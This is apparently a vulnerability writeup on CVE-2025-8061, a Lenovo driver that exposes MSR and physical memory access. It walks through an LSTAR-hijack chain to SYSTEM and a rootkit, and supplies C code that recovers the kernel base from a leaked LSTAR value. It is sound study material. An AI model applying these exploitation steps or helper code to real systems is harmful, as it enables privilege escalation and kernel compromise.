
CVE-2025-8061

LnvMSRIO.sys -- Lenovo pre-installed driver gives any local process unrestricted MSR and physical memory access, complete SYSTEM exploit chain published

Summary

Field Value
Driver LnvMSRIO.sys (Lenovo Dispatcher 3.0 / 3.1)
Vendor Lenovo
Vulnerability Class Insufficient Access Control / Arbitrary MSR R/W / Physical Memory R/W
Exploited ITW No (multiple public PoCs)
Status Patched in v3.1.0.41 (September 2025); older versions still loadable

Context

CVE-2025-8061 is a textbook case of a vendor utility driver that ships on millions of consumer laptops and exposes the most powerful hardware primitives to any local process. Lenovo's Dispatcher driver provides MSR read/write and physical memory read/write through IOCTLs with no access restrictions. Quarkslab published a two-part exploit series showing the complete path from unprivileged user to SYSTEM, plus a full kernel rootkit built on the same primitives.

What makes this CVE particularly instructive is the quality of public analysis. Quarkslab's writeup walks through KASLR bypass via MSR leak, LSTAR overwrite for syscall hijacking, and token theft, providing a complete reference implementation for MSR-based kernel exploitation.

Root Cause

The Lenovo Dispatcher driver exposes four IOCTL handlers, each providing unrestricted access to a critical hardware interface:

MSR read allows reading any Model-Specific Register, including IA32_LSTAR (0xC0000082), which holds the address of the kernel's system-call entry point: KiSystemCall64, or KiSystemCall64Shadow on systems with KVA shadowing enabled. Both live inside ntoskrnl.exe, so a single read hands the attacker a kernel pointer from which the image base can be computed, defeating KASLR.

MSR write allows overwriting any MSR, including IA32_LSTAR. MSRs are per logical processor, so the write redirects every subsequent system call made on the core the IOCTL executed on through an attacker-controlled address; an exploit therefore pins its thread to one core so that the write, the triggering syscall and the later restore all hit the same LSTAR.

Physical memory read maps and reads arbitrary physical addresses via MmMapIoSpace, allowing the attacker to scan physical memory for kernel structures.

Physical memory write maps and writes arbitrary physical addresses, providing a direct physical memory write primitive.

The driver is signed by Lenovo and ships pre-installed on consumer notebooks as part of the Lenovo Dispatcher service. No special privileges beyond local authentication are required to open the device and invoke these IOCTLs.
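The absence of an access requirement is visible before the driver's code is even reached: the I/O manager checks the access bits encoded in the control code against the rights on the caller's handle. The following is an added example, not Quarkslab's or Lenovo's code, that decodes a Windows IOCTL into its CTL_CODE fields and applies it to the MSR-read code 0x9c402084 cited in this writeup. No device name or buffer layout is assumed; only the control code from the text is used.

```c
/* Added example (not from the original writeup): decode a Windows IOCTL
 * control code into its CTL_CODE fields. Applied to 0x9c402084, the
 * LnvMSRIO.sys MSR-read IOCTL named in the text. */
#include <stdint.h>
#include <stdio.h>

/* CTL_CODE layout: (DeviceType << 16) | (Access << 14) | (Function << 2) | Method */
typedef struct {
    uint16_t device_type;  /* >= 0x8000: vendor-defined device type */
    uint8_t  access;       /* 0 FILE_ANY_ACCESS, 1 READ, 2 WRITE, 3 both */
    uint16_t function;     /* 12-bit function number, >= 0x800 for vendors */
    uint8_t  method;       /* 0 BUFFERED, 1 IN_DIRECT, 2 OUT_DIRECT, 3 NEITHER */
} ioctl_fields;

ioctl_fields decode_ioctl(uint32_t code)
{
    ioctl_fields f;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3);
    f.function    = (uint16_t)((code >> 2) & 0xFFF);
    f.method      = (uint8_t)(code & 0x3);
    return f;
}

/* Inverse of decode_ioctl, so a decoded code can be checked round-trip. */
uint32_t encode_ioctl(ioctl_fields f)
{
    return ((uint32_t)f.device_type << 16) | ((uint32_t)f.access << 14) |
           ((uint32_t)f.function << 2) | (uint32_t)f.method;
}

const char *access_name(uint8_t a)
{
    static const char *n[] = { "FILE_ANY_ACCESS", "FILE_READ_ACCESS",
                               "FILE_WRITE_ACCESS", "FILE_READ_ACCESS|FILE_WRITE_ACCESS" };
    return n[a & 3];
}

const char *method_name(uint8_t m)
{
    static const char *n[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                               "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return n[m & 3];
}

/* True when the I/O manager forwards the request on any handle at all,
 * i.e. the only remaining gates are the device DACL and the driver's own
 * handler. For LnvMSRIO.sys neither of those restricts the caller. */
int ioctl_open_to_any_handle(uint32_t code)
{
    return decode_ioctl(code).access == 0;
}

int main(void)
{
    uint32_t code = 0x9c402084;  /* MSR-read IOCTL cited in the writeup */
    ioctl_fields f = decode_ioctl(code);
    printf("0x%08x: device 0x%04x function 0x%03x %s %s\n", code, f.device_type,
           f.function, method_name(f.method), access_name(f.access));
    printf("reachable from any handle: %s\n",
           ioctl_open_to_any_handle(code) ? "yes" : "no");
    return 0;
}
```

The decode gives device type 0x9c40 (vendor range), function 0x821, METHOD_BUFFERED and FILE_ANY_ACCESS. FILE_ANY_ACCESS is not the bug by itself, but it means the control code asks nothing of the handle; everything then depends on the device object's DACL and the dispatch routine, and this driver restricts neither.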

Exploitation

Quarkslab's two-part series documents the full exploitation path.

Part 1 builds a SYSTEM shell. The exploit starts by reading IA32_LSTAR through IOCTL 0x9c402084. This returns the address of the kernel's syscall entry point (KiSystemCall64, or KiSystemCall64Shadow where KVA shadowing is on); either way the pointer lies inside ntoskrnl.exe, so the kernel base is computed from it and KASLR falls in a single call. Next, the exploit overwrites IA32_LSTAR with the address of token-stealing shellcode. Because MSRs are per logical processor, only the core on which the IOCTL ran is affected, and the exploit has to pin itself to that core for the write, the triggering syscall and the restore. The next system call from any thread on that processor now lands in the shellcode instead of the real KiSystemCall64. The shellcode runs in ring 0 under two constraints the real entry point normally takes care of: swapgs has not executed yet, so GS still holds the user-mode base, and SMEP blocks execution of user-mode pages, so the shellcode must reside in kernel-accessible memory. The shellcode walks _KPCR to _KTHREAD to _EPROCESS, finds the SYSTEM process token, and copies it to the current process. It then immediately restores the original IA32_LSTAR value so that subsequent system calls do not bugcheck the machine. The attacker now has a SYSTEM token.

Part 2 builds a kernel rootkit. Using the same MSR and physical memory primitives, Quarkslab demonstrates process hiding, callback interception, and persistence mechanisms, all without writing a single kernel driver of their own.

Exploitation Primitive

IOCTL 0x9c402084 --> read IA32_LSTAR MSR --> leak KiSystemCall64 --> KASLR bypass
  --> overwrite IA32_LSTAR with shellcode address
  --> next syscall executes token-stealing shellcode
  --> restore LSTAR --> SYSTEM
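The step "from which the kernel base is computed" hides real work: the leak is a pointer into the middle of ntoskrnl.exe, not the image base. The following is an added example, not Quarkslab's code, showing one standard way to close that gap: page-align the leaked handler address and walk backwards until a page starting with an 'MZ' header whose e_lfanew points at 'PE\0\0' is found. It assumes an abstract kernel-virtual read callback; with LnvMSRIO.sys that callback would have to be built on top of the physical-memory read IOCTL plus a virtual-to-physical translation, which this example does not show. The kernel image, base address and handler RVA below are constructed stand-ins so the code runs offline; they are not real Windows offsets. The walk relies on the handler being inside ntoskrnl, which holds for both KiSystemCall64 and KiSystemCall64Shadow.

```c
/* Added example (not from the original writeup): recover the ntoskrnl
 * image base from a leaked IA32_LSTAR value by scanning backwards for
 * the PE header. The kernel read primitive is abstracted; the memory
 * image used here is a constructed fake so the example runs offline. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PAGE_SIZE 0x1000ULL
#define IA32_LSTAR 0xC0000082u   /* MSR index the driver is asked to read */

/* Kernel-virtual read primitive: fills `out` with `len` bytes at `va`,
 * returns 0 on success or nonzero when the page is not readable. A real
 * implementation must verify the page is mapped before touching it;
 * an arbitrary-read of an unmapped kernel page bugchecks the machine. */
typedef int (*kread_fn)(void *ctx, uint64_t va, void *out, size_t len);

/* 'MZ' at page start and 'PE\0\0' at e_lfanew: this page begins a PE image. */
static int looks_like_pe_image(kread_fn kread, void *ctx, uint64_t page)
{
    uint8_t hdr[0x40];
    uint32_t e_lfanew;
    uint8_t sig[4];
    if (kread(ctx, page, hdr, sizeof hdr) != 0) return 0;
    if (hdr[0] != 'M' || hdr[1] != 'Z') return 0;
    memcpy(&e_lfanew, hdr + 0x3c, sizeof e_lfanew);
    if (e_lfanew < 0x40 || e_lfanew > 0x400) return 0;   /* implausible header */
    if (kread(ctx, page + e_lfanew, sig, sizeof sig) != 0) return 0;
    return memcmp(sig, "PE\0\0", 4) == 0;
}

/* Walk backwards one page at a time from the leaked handler address.
 * Returns the image base, or 0 if no PE header is found within max_pages. */
uint64_t kernel_base_from_lstar(uint64_t lstar, kread_fn kread, void *ctx,
                                unsigned max_pages)
{
    uint64_t page = lstar & ~(PAGE_SIZE - 1);
    for (unsigned i = 0; i < max_pages; i++, page -= PAGE_SIZE)
        if (looks_like_pe_image(kread, ctx, page))
            return page;
    return 0;
}

/* --- constructed stand-in for kernel memory (not a real kernel image) --- */
typedef struct { uint64_t base; uint8_t *bytes; size_t size; } fake_kernel;

int fake_kread(void *ctx, uint64_t va, void *out, size_t len)
{
    const fake_kernel *k = ctx;
    if (va < k->base || va + len > k->base + k->size) return -1;  /* unmapped */
    memcpy(out, k->bytes + (va - k->base), len);
    return 0;
}

fake_kernel *make_fake_kernel(uint64_t base, size_t size, uint32_t e_lfanew)
{
    fake_kernel *k = malloc(sizeof *k);
    k->base = base;
    k->size = size;
    k->bytes = calloc(size, 1);
    k->bytes[0] = 'M';
    k->bytes[1] = 'Z';
    memcpy(k->bytes + 0x3c, &e_lfanew, sizeof e_lfanew);
    memcpy(k->bytes + e_lfanew, "PE\0\0", 4);
    return k;
}

void free_fake_kernel(fake_kernel *k) { free(k->bytes); free(k); }

/* Demo with made-up numbers: the base and the handler RVA are assumptions. */
uint64_t demo_recover_base(void)
{
    const uint64_t assumed_base = 0xfffff80312400000ULL;
    const uint64_t assumed_rva  = 0x1c3a40;   /* hypothetical KiSystemCall64 RVA */
    fake_kernel *k = make_fake_kernel(assumed_base, 0x400000, 0xf8);
    uint64_t leaked = assumed_base + assumed_rva;   /* what the MSR read returns */
    uint64_t base = kernel_base_from_lstar(leaked, fake_kread, k, 0x4000);
    free_fake_kernel(k);
    return base;
}

int main(void)
{
    printf("recovered kernel base: 0x%016llx\n",
           (unsigned long long)demo_recover_base());
    return 0;
}
```

The max_pages bound matters on a real target: ntoskrnl.exe is roughly ten megabytes, so a few thousand pages covers it, and stopping there avoids walking off the image into whatever is mapped below it.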

Techniques Used

Technique KernelSight Page
Token Swapping Token Swapping
KASLR Bypass (MSR leak) KASLR Bypasses
Direct IOCTL R/W Direct IOCTL R/W

Broader Significance

CVE-2025-8061 exposes a systemic problem with vendor utility drivers. Lenovo shipped this driver pre-installed on consumer laptops, meaning millions of machines had a kernel-level backdoor available to any local attacker. The patch arrived in September 2025, but a patch does not invalidate the signature on earlier builds: a vulnerable copy of LnvMSRIO.sys is still a validly signed driver, and Windows will load it on any machine whose driver blocklist does not name it, which makes it a BYOVD payload for an attacker who already holds administrator rights on an otherwise unaffected system. Until Microsoft adds the vulnerable versions to the vulnerable driver blocklist, and that blocklist is actually enforced on the host (via HVCI or the blocklist setting in Windows Security), the patched driver coexists with loadable vulnerable copies.

The Quarkslab writeup also serves as one of the clearest public references for MSR-based kernel exploitation, making CVE-2025-8061 both a vulnerability and an educational resource.

References